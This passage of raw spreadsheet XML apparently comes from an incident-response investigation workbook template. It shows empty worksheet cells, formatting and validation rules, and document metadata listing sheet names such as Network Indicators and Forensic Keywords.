  </cols>
  <sheetData>
    <row r="1" spans="1:17" ht="15.75" customHeight="1">
      <c r="A1" s="1"/>
      <c r="B1" s="1"/>
      <c r="C1" s="23"/>
      <c r="D1" s="23"/>
      <c r="E1" s="23"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="24"/>
      <c r="K1" s="1"/>
      <c r="L1" s="1"/>
      <c r="M1" s="1"/>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1"/>
      <c r="Q1" s="1"/>
    </row>
    <row r="2" spans="1:17" ht="15.75" customHeight="1">
      <c r="A2" s="1"/>
      <c r="B2" s="33" t="s">
        <v>35</v>
      </c>
      <c r="C2" s="37" t="s">
        <v>24</v>
      </c>
      <c r="D2" s="37" t="s">
        <v>56</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>53</v>
      </c>
      <c r="F2" s="38" t="s">
        <v>71</v>
      </c>
      <c r="G2" s="18" t="s">
        <v>72</v>
      </c>
      <c r="H2" s="39" t="s">
        <v>73</v>
      </c>
      <c r="I2" s="39" t="s">
        <v>74</v>
      </c>
      <c r="J2" s="40" t="s">
        <v>75</v>
      </c>
      <c r="K2" s="41" t="s">
        <v>76</v>
      </c>
      <c r="L2" s="41" t="s">
        <v>77</v>
      </c>
      <c r="M2" s="39" t="s">
        <v>78</v>
      </c>
      <c r="N2" s="39" t="s">
        <v>44</v>
      </c>
      <c r="O2" s="18" t="s">
        <v>43</v>
      </c>
      <c r="P2" s="33" t="s">
        <v>26</v>
      </c>
      <c r="Q2" s="1"/>
    </row>
    <row r="3" spans="1:17" ht="15.75" customHeight="1">
      <c r="B3" s="34"/>
      <c r="C3" s="35"/>
      <c r="D3" s="35"/>
      <c r="E3" s="34"/>
      <c r="F3" s="34" t="s">
        <v>79</v>
      </c>
      <c r="G3" s="120" t="s">
        <v>279</v>
      </c>
      <c r="H3" s="77" t="s">
        <v>277</v>
      </c>
      <c r="I3" s="77"/>
      <c r="J3" s="34"/>
      <c r="K3" s="42"/>
      <c r="L3" s="73"/>
      <c r="M3" s="34" t="s">
        <v>385</v>
      </c>
      <c r="N3" s="73"/>
      <c r="O3" s="34"/>
      <c r="P3" s="22"/>
    </row>
    <row r="4" spans="1:17" ht="15.75" customHeight="1">
      <c r="B4" s="34"/>
      <c r="C4" s="35"/>
      <c r="D4" s="35"/>
      <c r="E4" s="35"/>
      <c r="F4" s="34" t="s">
        <v>80</v>
      </c>
      <c r="G4" s="34"/>
      <c r="H4" s="77"/>
      <c r="I4" s="77"/>
      <c r="J4" s="34"/>
      <c r="K4" s="42"/>
      <c r="L4" s="73"/>
      <c r="M4" s="34"/>
      <c r="N4" s="73"/>
      <c r="O4" s="34"/>
      <c r="P4" s="22"/>
      <c r="Q4" s="1"/>
    </row>
    <row r="5" spans="1:17" ht="15.75" customHeight="1">
      <c r="B5" s="34"/>
      <c r="C5" s="35"/>
      <c r="D5" s="35"/>
      <c r="E5" s="35"/>
      <c r="F5" s="34" t="s">
        <v>81</v>
      </c>
      <c r="G5" s="34"/>
      <c r="H5" s="34"/>
      <c r="I5" s="34"/>
      <c r="J5" s="34"/>
      <c r="K5" s="42"/>
      <c r="L5" s="34"/>
      <c r="M5" s="34"/>
      <c r="N5" s="34"/>
      <c r="O5" s="34"/>
      <c r="P5" s="22"/>
    </row>
    <row r="6" spans="1:17" ht="15.75" customHeight="1">
      <c r="B6" s="34"/>
      <c r="C6" s="35"/>
      <c r="D6" s="35"/>
      <c r="E6" s="35"/>
      <c r="F6" s="34" t="s">
        <v>82</v>
      </c>
      <c r="G6" s="34"/>
      <c r="H6" s="73"/>
      <c r="I6" s="73"/>
      <c r="J6" s="88"/>
      <c r="K6" s="89"/>
      <c r="L6" s="90"/>
      <c r="M6" s="91"/>
      <c r="N6" s="34"/>
      <c r="O6" s="34"/>
      <c r="P6" s="22"/>
    </row>
    <row r="7" spans="1:17" ht="15.75" customHeight="1">
      <c r="B7" s="34"/>
      <c r="C7" s="35"/>
      <c r="D7" s="35"/>
      <c r="E7" s="35"/>
      <c r="F7" s="34" t="s">
        <v>83</v>
      </c>
      <c r="G7" s="34"/>
      <c r="H7" s="34"/>
      <c r="I7" s="92"/>
      <c r="J7" s="88"/>
      <c r="K7" s="34"/>
      <c r="L7" s="90"/>
      <c r="M7" s="91"/>
      <c r="N7" s="34"/>
      <c r="O7" s="34"/>
      <c r="P7" s="22"/>
      <c r="Q7" s="1"/>
    </row>
    <row r="8" spans="1:17" ht="15.75" customHeight="1">
      <c r="B8" s="34"/>
      <c r="C8" s="35"/>
      <c r="D8" s="35"/>
      <c r="E8" s="35"/>
      <c r="F8" s="34" t="s">
        <v>84</v>
      </c>
      <c r="G8" s="34"/>
      <c r="H8" s="93"/>
      <c r="I8" s="92"/>
      <c r="J8" s="88"/>
      <c r="K8" s="93"/>
      <c r="L8" s="90"/>
      <c r="M8" s="91"/>
      <c r="N8" s="34"/>
      <c r="O8" s="34"/>
      <c r="P8" s="22"/>
      <c r="Q8" s="1"/>
    </row>
    <row r="9" spans="1:17" ht="15.75" customHeight="1">
      <c r="B9" s="34"/>
      <c r="C9" s="35"/>
      <c r="D9" s="35"/>
      <c r="E9" s="35"/>
      <c r="F9" s="34" t="s">
        <v>85</v>
      </c>
      <c r="G9" s="34"/>
      <c r="H9" s="34"/>
      <c r="I9" s="92"/>
      <c r="J9" s="88"/>
      <c r="K9" s="89"/>
      <c r="L9" s="90"/>
      <c r="M9" s="91"/>
      <c r="N9" s="34"/>
      <c r="O9" s="34"/>
      <c r="P9" s="22"/>
    </row>
    <row r="10" spans="1:17" ht="15.75" customHeight="1">
      <c r="B10" s="34"/>
      <c r="C10" s="35"/>
      <c r="D10" s="35"/>
      <c r="E10" s="35"/>
      <c r="F10" s="34" t="s">
        <v>86</v>
      </c>
      <c r="G10" s="34"/>
      <c r="H10" s="73"/>
      <c r="I10" s="73"/>
      <c r="J10" s="88"/>
      <c r="K10" s="89"/>
      <c r="L10" s="90"/>
      <c r="M10" s="91"/>
      <c r="N10" s="34"/>
      <c r="O10" s="34"/>
      <c r="P10" s="110"/>
    </row>
    <row r="11" spans="1:17" ht="15.75" customHeight="1">
      <c r="B11" s="34"/>
      <c r="C11" s="35"/>
      <c r="D11" s="35"/>
      <c r="E11" s="35"/>
      <c r="F11" s="34" t="s">
        <v>87</v>
      </c>
      <c r="G11" s="34"/>
      <c r="H11" s="73"/>
      <c r="I11" s="73"/>
      <c r="J11" s="88"/>
      <c r="K11" s="89"/>
      <c r="L11" s="90"/>
      <c r="M11" s="91"/>
      <c r="N11" s="34"/>
      <c r="O11" s="34"/>
      <c r="P11" s="110"/>
    </row>
    <row r="12" spans="1:17" ht="15.75" customHeight="1">
      <c r="B12" s="34"/>
      <c r="C12" s="35"/>
      <c r="D12" s="43"/>
      <c r="E12" s="43"/>
      <c r="F12" s="34" t="s">
        <v>88</v>
      </c>
      <c r="G12" s="34"/>
      <c r="H12" s="34"/>
      <c r="I12" s="34"/>
      <c r="J12" s="42"/>
      <c r="K12" s="42"/>
      <c r="L12" s="34"/>
      <c r="M12" s="34"/>
      <c r="N12" s="34"/>
      <c r="O12" s="34"/>
      <c r="P12" s="22"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="J2:L2">
    <cfRule type="expression" dxfId="14" priority="1">
      <formula>COUNTIF(J:J,J2)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" sqref="E3:E12" xr:uid="{00000000-0002-0000-0600-000000000000}">
      <formula1>"Confirmed,Suspicious,Under Investigation,Unrelated"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DEA4A-386F-403F-836D-AA7837ABB817}">
  <sheetPr>
    <tabColor rgb="FF990000"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:V12"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <selection activeCell="X1" activeCellId="1" sqref="W1:W1048576 X1:X1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="13.44140625" customWidth="1"/>
    <col min="3" max="3" width="11.6640625" customWidth="1"/>
    <col min="4" max="4" width="12.33203125" customWidth="1"/>
    <col min="5" max="5" width="14.6640625" customWidth="1"/>
    <col min="6" max="6" width="11.44140625" customWidth="1"/>
    <col min="7" max="7" width="6.109375" customWidth="1"/>
    <col min="8" max="8" width="8.109375" customWidth="1"/>
    <col min="9" max="9" width="35.44140625" customWidth="1"/>
    <col min="10" max="10" width="16.77734375" customWidth="1"/>
    <col min="11" max="11" width="9.109375" customWidth="1"/>
    <col min="12" max="12" width="14.88671875" customWidth="1"/>
    <col min="13" max="13" width="25.44140625" customWidth="1"/>
    <col min="14" max="14" width="11.6640625" customWidth="1"/>
    <col min="15" max="15" width="16" customWidth="1"/>
    <col min="16" max="16" width="15" customWidth="1"/>
    <col min="17" max="17" width="19.44140625" customWidth="1"/>
    <col min="18" max="18" width="19.77734375" customWidth="1"/>
    <col min="22" max="22" width="21.5546875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:22" ht="15.75" customHeight="1">
      <c r="A1" s="1"/>
      <c r="B1" s="1"/>
      <c r="C1" s="23"/>
      <c r="D1" s="23"/>
      <c r="E1" s="23"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="24"/>
      <c r="K1" s="1"/>
      <c r="L1" s="1"/>
      <c r="M1" s="1"/>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1"/>
      <c r="R1" s="1"/>
    </row>
    <row r="2" spans="1:22" ht="15.75" customHeight="1">
      <c r="A2" s="1"/>
      <c r="B2" s="33" t="s">
        <v>35</v>
      </c>
      <c r="C2" s="37" t="s">
        <v>24</v>
      </c>
      <c r="D2" s="37" t="s">
        <v>56</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>53</v>
      </c>
      <c r="F2" s="38" t="s">
        <v>71</v>
      </c>
      <c r="G2" s="18" t="s">
        <v>198</v>
      </c>
      <c r="H2" s="39" t="s">
        <v>202</v>
      </c>
      <c r="I2" s="39" t="s">
        <v>205</v>
      </c>
      <c r="J2" s="40" t="s">
        <v>209</v>
      </c>
      <c r="K2" s="41" t="s">
        <v>213</v>
      </c>
      <c r="L2" s="41" t="s">
        <v>216</v>
      </c>
      <c r="M2" s="39" t="s">
        <v>220</v>
      </c>
      <c r="N2" s="39" t="s">
        <v>224</v>
      </c>
      <c r="O2" s="18" t="s">
        <v>232</v>
      </c>
      <c r="P2" s="39" t="s">
        <v>236</v>
      </c>
      <c r="Q2" s="39" t="s">
        <v>256</v>
      </c>
      <c r="R2" s="113" t="s">
        <v>228</v>
      </c>
      <c r="S2" s="114" t="s">
        <v>240</v>
      </c>
      <c r="T2" s="115" t="s">
        <v>244</v>
      </c>
      <c r="U2" s="116" t="s">
        <v>248</v>
      </c>
      <c r="V2" s="116" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="3" spans="1:22" ht="15.75" customHeight="1">
      <c r="B3" s="34"/>
      <c r="C3" s="35"/>
      <c r="D3" s="35"/>
      <c r="E3" s="34"/>
      <c r="F3" s="34" t="s">
        <v>185</v>
      </c>
      <c r="G3" s="34"/>
      <c r="H3" s="77"/>
      <c r="I3" s="77"/>
      <c r="J3" s="34"/>
      <c r="K3" s="42"/>
      <c r="L3" s="73"/>
      <c r="M3" s="34"/>
      <c r="N3" s="73"/>
      <c r="O3" s="34"/>
      <c r="P3" s="77"/>
      <c r="Q3" s="34"/>
      <c r="R3" s="34"/>
      <c r="S3" s="77"/>
      <c r="T3" s="34"/>
      <c r="U3" s="42"/>
      <c r="V3" s="73"/>
    </row>
    <row r="4" spans="1:22" ht="15.75" customHeight="1">
      <c r="B4" s="34"/>
      <c r="C4" s="35"/>
      <c r="D4" s="35"/>
      <c r="E4" s="35"/>
      <c r="F4" s="34" t="s">
        <v>186</v>
      </c>
      <c r="G4" s="34"/>
      <c r="H4" s="77"/>
      <c r="I4" s="77"/>
      <c r="J4" s="34"/>
      <c r="K4" s="42"/>
      <c r="L4" s="73"/>
      <c r="M4" s="34"/>
      <c r="N4" s="73"/>
      <c r="O4" s="34"/>
      <c r="P4" s="77"/>
      <c r="Q4" s="34"/>
      <c r="R4" s="34"/>
      <c r="S4" s="77"/>
      <c r="T4" s="34"/>
      <c r="U4" s="42"/>
      <c r="V4" s="73"/>
    </row>
    <row r="5" spans="1:22" ht="15.75" customHeight="1">
      <c r="B5" s="34"/>
      <c r="C5" s="35"/>
      <c r="D5" s="35"/>
      <c r="E5" s="35"/>
      <c r="F5" s="34" t="s">
        <v>187</v>
      </c>
      <c r="G5" s="34"/>
      <c r="H5" s="34"/>
      <c r="I5" s="34"/>
      <c r="J5" s="34"/>
      <c r="K5" s="42"/>
      <c r="L5" s="34"/>
      <c r="M5" s="34"/>
      <c r="N5" s="34"/>
      <c r="O5" s="34"/>
      <c r="P5" s="34"/>
      <c r="Q5" s="34"/>
      <c r="R5" s="34"/>
      <c r="S5" s="34"/>
      <c r="T5" s="34"/>
      <c r="U5" s="42"/>
      <c r="V5" s="34"/>
    </row>
    <row r="6" spans="1:22" ht="15.75" customHeight="1">
      <c r="B6" s="34"/>
      <c r="C6" s="35"/>
      <c r="D6" s="35"/>
      <c r="E6" s="35"/>
      <c r="F6" s="34" t="s">
        <v>188</v>
      </c>
      <c r="G6" s="34"/>
      <c r="H6" s="73"/>
      <c r="I6" s="73"/>
      <c r="J6" s="88"/>
      <c r="K6" s="89"/>
      <c r="L6" s="90"/>
      <c r="M6" s="91"/>
      <c r="N6" s="34"/>
      <c r="O6" s="34"/>
      <c r="P6" s="73"/>
      <c r="Q6" s="91"/>
      <c r="R6" s="34"/>
      <c r="S6" s="73"/>
      <c r="T6" s="88"/>
      <c r="U6" s="89"/>
      <c r="V6" s="90"/>
    </row>
    <row r="7" spans="1:22" ht="15.75" customHeight="1">
      <c r="B7" s="34"/>
      <c r="C7" s="35"/>
      <c r="D7" s="35"/>
      <c r="E7" s="35"/>
      <c r="F7" s="34" t="s">
        <v>189</v>
      </c>
      <c r="G7" s="34"/>
      <c r="H7" s="34"/>
      <c r="I7" s="92"/>
      <c r="J7" s="88"/>
      <c r="K7" s="34"/>
      <c r="L7" s="90"/>
      <c r="M7" s="91"/>
      <c r="N7" s="34"/>
      <c r="O7" s="34"/>
      <c r="P7" s="34"/>
      <c r="Q7" s="91"/>
      <c r="R7" s="34"/>
      <c r="S7" s="92"/>
      <c r="T7" s="88"/>
      <c r="U7" s="34"/>
      <c r="V7" s="90"/>
    </row>
    <row r="8" spans="1:22" ht="15.75" customHeight="1">
      <c r="B8" s="34"/>
      <c r="C8" s="35"/>
      <c r="D8" s="35"/>
      <c r="E8" s="35"/>
      <c r="F8" s="34" t="s">
        <v>190</v>
      </c>
      <c r="G8" s="34"/>
      <c r="H8" s="93"/>
      <c r="I8" s="92"/>
      <c r="J8" s="88"/>
      <c r="K8" s="93"/>
      <c r="L8" s="90"/>
      <c r="M8" s="91"/>
      <c r="N8" s="34"/>
      <c r="O8" s="34"/>
      <c r="P8" s="93"/>
      <c r="Q8" s="91"/>
      <c r="R8" s="34"/>
      <c r="S8" s="92"/>
      <c r="T8" s="88"/>
      <c r="U8" s="93"/>
      <c r="V8" s="90"/>
    </row>
    <row r="9" spans="1:22" ht="15.75" customHeight="1">
      <c r="B9" s="34"/>
      <c r="C9" s="35"/>
      <c r="D9" s="35"/>
      <c r="E9" s="35"/>
      <c r="F9" s="34" t="s">
        <v>191</v>
      </c>
      <c r="G9" s="34"/>
      <c r="H9" s="34"/>
      <c r="I9" s="92"/>
      <c r="J9" s="88"/>
      <c r="K9" s="89"/>
      <c r="L9" s="90"/>
      <c r="M9" s="91"/>
      <c r="N9" s="34"/>
      <c r="O9" s="34"/>
      <c r="P9" s="34"/>
      <c r="Q9" s="91"/>
      <c r="R9" s="34"/>
      <c r="S9" s="92"/>
      <c r="T9" s="88"/>
      <c r="U9" s="89"/>
      <c r="V9" s="90"/>
    </row>
    <row r="10" spans="1:22" ht="15.75" customHeight="1">
      <c r="B10" s="34"/>
      <c r="C10" s="35"/>
      <c r="D10" s="35"/>
      <c r="E10" s="35"/>
      <c r="F10" s="34" t="s">
        <v>192</v>
      </c>
      <c r="G10" s="34"/>
      <c r="H10" s="73"/>
      <c r="I10" s="73"/>
      <c r="J10" s="88"/>
      <c r="K10" s="89"/>
      <c r="L10" s="90"/>
      <c r="M10" s="91"/>
      <c r="N10" s="34"/>
      <c r="O10" s="34"/>
      <c r="P10" s="73"/>
      <c r="Q10" s="91"/>
      <c r="R10" s="34"/>
      <c r="S10" s="73"/>
      <c r="T10" s="88"/>
      <c r="U10" s="89"/>
      <c r="V10" s="90"/>
    </row>
    <row r="11" spans="1:22" ht="15.75" customHeight="1">
      <c r="B11" s="34"/>
      <c r="C11" s="35"/>
      <c r="D11" s="35"/>
      <c r="E11" s="35"/>
      <c r="F11" s="34" t="s">
        <v>193</v>
      </c>
      <c r="G11" s="34"/>
      <c r="H11" s="73"/>
      <c r="I11" s="73"/>
      <c r="J11" s="88"/>
      <c r="K11" s="89"/>
      <c r="L11" s="90"/>
      <c r="M11" s="91"/>
      <c r="N11" s="34"/>
      <c r="O11" s="34"/>
      <c r="P11" s="73"/>
      <c r="Q11" s="91"/>
      <c r="R11" s="34"/>
      <c r="S11" s="73"/>
      <c r="T11" s="88"/>
      <c r="U11" s="89"/>
      <c r="V11" s="90"/>
    </row>
    <row r="12" spans="1:22" ht="15.75" customHeight="1">
      <c r="B12" s="34"/>
      <c r="C12" s="35"/>
      <c r="D12" s="43"/>
      <c r="E12" s="43"/>
      <c r="F12" s="34" t="s">
        <v>194</v>
      </c>
      <c r="G12" s="34"/>
      <c r="H12" s="34"/>
      <c r="I12" s="34"/>
      <c r="J12" s="42"/>
      <c r="K12" s="42"/>
      <c r="L12" s="34"/>
      <c r="M12" s="34"/>
      <c r="N12" s="34"/>
      <c r="O12" s="34"/>
      <c r="P12" s="34"/>
      <c r="Q12" s="34"/>
      <c r="R12" s="34"/>
      <c r="S12" s="34"/>
      <c r="T12" s="42"/>
      <c r="U12" s="42"/>
      <c r="V12" s="34"/>
    </row>
  </sheetData>
  <phoneticPr fontId="22" type="noConversion"/>
  <conditionalFormatting sqref="J2:L2">
    <cfRule type="expression" dxfId="13" priority="2">
      <formula>COUNTIF(J:J,J2)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="T2:V2">
    <cfRule type="expression" dxfId="12" priority="1">
      <formula>COUNTIF(T:T,T2)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" sqref="E3:E12" xr:uid="{476404D8-EF51-4A68-BB86-FB3309CB7C3E}">
      <formula1>"Confirmed,Suspicious,Under Investigation,Unrelated"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Worksheets</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="14" baseType="lpstr">
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Investigation Notes</vt:lpstr>
      <vt:lpstr>Contact Info</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>Systems</vt:lpstr>
      <vt:lpstr>Accounts</vt:lpstr>
      <vt:lpstr>Network Indicators</vt:lpstr>
      <vt:lpstr>Host Indicators</vt:lpstr>
      <vt:lpstr>Memory Indicators</vt:lpstr>
      <vt:lpstr>Request &amp; Task Tracker</vt:lpstr>
      <vt:lpstr>Evidence Tracker</vt:lpstr>
      <vt:lpstr>Forensic Keywords</vt:lpstr>
      <vt:lpstr>Investigative Queries</vt:lpstr>
      <vt:lpstr>linux memory headers</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>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cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-30T13:43:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-27T07:59:14Z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24dbb1d-991d-4bbd-aad5-33bac1d8ffaf_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_924dbb1d-991d-4bbd-aad5-33bac1d8ffaf_SetDate">
    <vt:lpwstr>2025-01-10T02:54:47Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_924dbb1d-991d-4bbd-aad5-33bac1d8ffaf_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_924dbb1d-991d-4bbd-aad5-33bac1d8ffaf_Name">
    <vt:lpwstr>924dbb1d-991d-4bbd-aad5-33bac1d8ffaf</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_924dbb1d-991d-4bbd-aad5-33bac1d8ffaf_SiteId">
    <vt:lpwstr>9652d7c2-1ccf-4940-8151-4a92bd474ed0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_924dbb1d-991d-4bbd-aad5-33bac1d8ffaf_ActionId">
    <vt:lpwstr>16e0322a-c5f0-466b-8890-c899a1d0680c</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_924dbb1d-991d-4bbd-aad5-33bac1d8ffaf_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>